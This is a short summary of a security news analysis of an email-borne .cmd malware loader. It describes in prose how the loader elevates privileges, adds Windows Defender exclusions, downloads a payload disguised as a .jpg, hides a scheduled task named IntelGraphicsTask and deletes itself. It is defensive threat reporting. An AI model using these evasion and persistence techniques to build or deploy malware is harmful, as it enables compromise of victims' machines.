A Security Affairs piece published on 5 April 2026 describes a malicious email that delivers a .cmd malware capable of privilege escalation, bypassing antivirus, downloading payloads, establishing persistence, and self-deleting. The analysis highlights several code steps, including a PowerShell call to re-run the script with administrator privileges and another to add Windows Defender exclusions for the install directory and the final payload.
It shows the malware downloading a remote file via curl, disguising it as a .jpg, extracting a ZIP archive with tar, and renaming an extracted executable to a stealthy name before placing it on Defender’s exclusions list. The sample includes creating a hidden scheduled task (named IntelGraphicsTask) to achieve persistence and a scheduled reboot sequence to complete installation, followed by self-deletion of the loader.
The analyst notes that the download, extraction, and persistence mechanisms are designed to operate alongside a DLL and a binary, with initial indicators suggesting heavy obfuscation and multiple anti-analysis tricks; the review also mentions the analyst’s use of PEStudio for preliminary findings.